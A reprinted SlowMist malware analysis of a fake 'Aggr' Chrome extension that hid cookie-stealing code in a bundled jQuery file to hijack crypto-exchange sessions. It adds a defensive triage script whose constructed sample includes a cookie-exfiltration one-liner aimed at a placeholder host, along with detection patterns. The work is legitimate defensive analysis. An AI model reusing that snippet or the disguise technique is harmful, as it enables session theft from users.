False Chrome Extension Stealing Analysis

6/12/2024, 3:30:24 PM
Recently, several Web3 participants have lost funds from their accounts due to downloading a fake Chrome extension that reads browser cookies. The SlowMist team has conducted a detailed analysis of this scam tactic.

Background

On March 1, 2024, according to Twitter user @doomxbt, there was an abnormal situation with their Binance account, with funds suspected to have been stolen:

(https://x.com/doomxbt/status/1763237654965920175)

Initially, this incident didn’t attract much attention. However, on May 28, 2024, Twitter user @Tree_of_Alpha analyzed it and found that the victim, @doomxbt, had most likely installed a malicious Aggr extension from the Chrome Web Store, one that had many positive reviews (we didn’t confirm this directly with the victim)! This extension can steal all cookies from the websites a user visits, and two months earlier someone had paid influential individuals to promote it.

(https://x.com/Tree_of_Alpha/status/1795403185349099740)

Over the past few days this incident has drawn more attention. Victims’ login credentials were stolen, after which the hackers managed to steal cryptocurrency assets from the victims by brute-forcing. Many users have consulted the SlowMist security team about this issue. Below, we analyze the attack in detail to sound the alarm for the crypto community.

Analysis

Firstly, we need to find this malicious extension. Although Google has already removed the malicious extension, we can still access some historical data through snapshot information.

After downloading and analyzing the extension, we found several JS files in the directory: background.js, content.js, jquery-3.6.0.min.js, and jquery-3.5.1.min.js.

During static analysis, we observed that background.js and content.js do not contain overly complex code, nor any obviously suspicious logic. However, background.js does contain a link to an external website: the extension collects data and sends it to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

By analyzing the manifest.json file, we can see that background.js uses /jquery/jquery-3.6.0.min.js, and content.js uses /jquery/jquery-3.5.1.min.js. Let’s focus on analyzing these two jQuery files.

We discovered suspicious malicious code in jquery/jquery-3.6.0.min.js. The code serializes the browser’s cookies into JSON and sends them to the site https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
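The static findings above (risky manifest permissions, and cookie-reading plus network-sending code hidden inside a vendored jQuery file) can be turned into a triage script. The following is an added example written for this analysis, not SlowMist’s tooling; the extension files are constructed inline and the collector domain is a placeholder.

```javascript
// Added example, not SlowMist's code: static triage of an unpacked extension.
// Looks for the pattern described on the page: cookie read + outbound POST
// hidden in a bundled library file. Sample files are constructed inline;
// in real use, read them from the unpacked extension directory.
const RISKY_PERMS = new Set(["cookies", "<all_urls>", "webRequest", "tabs"]);
const COOKIE_RE = /chrome\.cookies\.getAll|document\.cookie/;
const SINK_RE = /\bfetch\(|XMLHttpRequest|\.ajax\(|\.post\(|sendBeacon\(/;
const EXT_API_RE = /\bchrome\.(cookies|tabs|runtime|storage|webRequest)\b/;
const URL_RE = /https?:\/\/[a-z0-9.-]+\.[a-z]{2,}(?:\/[^\s"'`)]*)?/gi;

// Constructed sample extension; the collector hostname is a placeholder.
const sampleExtension = {
  "manifest.json": JSON.stringify({
    manifest_version: 2, name: "Trading Helper",
    permissions: ["cookies", "<all_urls>", "storage"],
    background: { scripts: ["jquery/jquery-3.6.0.min.js", "background.js"] },
    content_scripts: [{ matches: ["<all_urls>"], js: ["jquery/jquery-3.5.1.min.js", "content.js"] }],
  }),
  "background.js": "chrome.runtime.onInstalled.addListener(()=>console.log('ready'));",
  "content.js": "document.title=document.title;",
  "jquery/jquery-3.6.0.min.js": "/*! jQuery v3.6.0 */chrome.cookies.getAll({},function(c){fetch('https://collector.example/statistics_collection/index.php',{method:'POST',body:JSON.stringify(c)})});",
  "jquery/jquery-3.5.1.min.js": "/*! jQuery v3.5.1 */!function(e,t){}(window);",
};

// Map each script path to the context(s) the manifest loads it in.
function scriptContexts(manifest) {
  const ctx = {};
  const bg = (manifest.background && manifest.background.scripts) || [];
  for (const s of bg) (ctx[s] = ctx[s] || []).push("background");
  for (const cs of manifest.content_scripts || [])
    for (const s of cs.js || []) (ctx[s] = ctx[s] || []).push("content");
  return ctx;
}

function triageExtension(files) {
  const manifest = JSON.parse(files["manifest.json"]);
  const contexts = scriptContexts(manifest);
  const findings = [];
  for (const p of manifest.permissions || [])
    if (RISKY_PERMS.has(p)) findings.push({ file: "manifest.json", type: "risky_permission", detail: p });
  for (const [path, src] of Object.entries(files)) {
    if (path === "manifest.json") continue;
    const urls = src.match(URL_RE) || [];
    const where = (contexts[path] || ["unreferenced"]).join("+");
    if (COOKIE_RE.test(src) && SINK_RE.test(src))
      findings.push({ file: path, type: "cookie_exfil", detail: `${where} -> ${urls.join(",")}` });
    // A genuine vendored library never calls chrome.* extension APIs.
    if (/jquery.*\.min\.js$/i.test(path) && EXT_API_RE.test(src))
      findings.push({ file: path, type: "tampered_library", detail: where });
  }
  return findings;
}
```

Hashing each vendored library against the upstream release is the stronger check; the regex heuristics here only flag what the page’s sample made visible.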

After the static analysis, to observe more precisely how the malicious extension sends data, we install and debug it. (Note: this analysis should be conducted in a completely fresh testing environment where no accounts are logged in, and the malicious site should be replaced with one you control, so that no sensitive data is sent to the attacker’s server.)

Once the malicious extension is installed in the testing environment, open any website, such as google.com, and observe the network requests the extension makes in the background. We observed the cookie data from Google being sent to an external server.

We also observed the cookie data sent by the malicious extension on the web log service.

At this point, once attackers hold a user’s authentication credentials obtained through the extension’s cookie hijacking, they can replay them against certain trading websites and steal the user’s cryptocurrency assets.

Let’s analyze the malicious link again: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

Domain involved: aggrtrade-extension[.]com

Parsing the domain registration information shown in the picture above:

The .ru suffix indicates that the registrant is likely a user from the Russian-speaking region, suggesting a high probability that Russian or Eastern European hacker groups are involved.

Attack Timeline:

Analyzing the malicious website mimicking AGGR (aggr.trade), aggrtrade-extension[.]com, we discovered that the hackers began planning the attack three years ago.

4 months ago, hackers deployed the attack:

According to the InMist threat intelligence cooperation network, we found that the hacker’s IP is located in Moscow, utilizing a VPS provided by srvape.com. Their email is aggrdev@gmail.com.

After successfully deploying, the hacker began promoting on Twitter, waiting for unsuspecting victims to fall into the trap. As for the rest of the story, it’s well-known – some users installed the malicious extension and subsequently fell victim to theft.

The following image is AggrTrade’s official warning:

Summary

The SlowMist security team advises all users that the risk of browser extensions is nearly as significant as running executable files directly. Therefore, it’s crucial to carefully review before installing. Also, be cautious of those who send you private messages. Nowadays, hackers and scammers often impersonate legitimate and well-known projects, claiming to offer sponsorship or promotion opportunities, targeting content creators for scams. Finally, when navigating the blockchain’s dark forest, always maintain a skeptical attitude to ensure that what you install is secure and not susceptible to exploitation by hackers.

Statement:

  1. This article is reproduced from [慢雾科技], the original title is “Wolf in Sheep’s Clothing | Fake Chrome Extension Theft Analysis”, the copyright belongs to the original author [Mountain&Thinking@Slow Mist Security Team], if you have any objection to the reprint, please contact Gate Learn Team, the team will handle it as soon as possible according to relevant procedures.

  2. Disclaimer: The views and opinions expressed in this article represent only the author’s personal views and do not constitute any investment advice.

  3. Other language versions of the article are translated by the Gate Learn team; without crediting Gate.io, the translated article may not be reproduced, distributed or plagiarized.
